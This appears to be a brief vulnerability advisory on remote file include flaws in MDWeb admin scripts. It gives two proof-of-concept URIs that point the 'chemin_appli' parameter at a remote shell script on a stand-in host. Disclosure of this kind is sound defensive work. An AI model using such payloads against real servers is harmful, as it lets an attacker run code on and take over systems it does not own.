MDWeb Multiple Remote File Include Vulnerabilities

MDWeb Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://www.example2.com/shell.php?
http://www.example.com/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://www.example2.com/shell.php?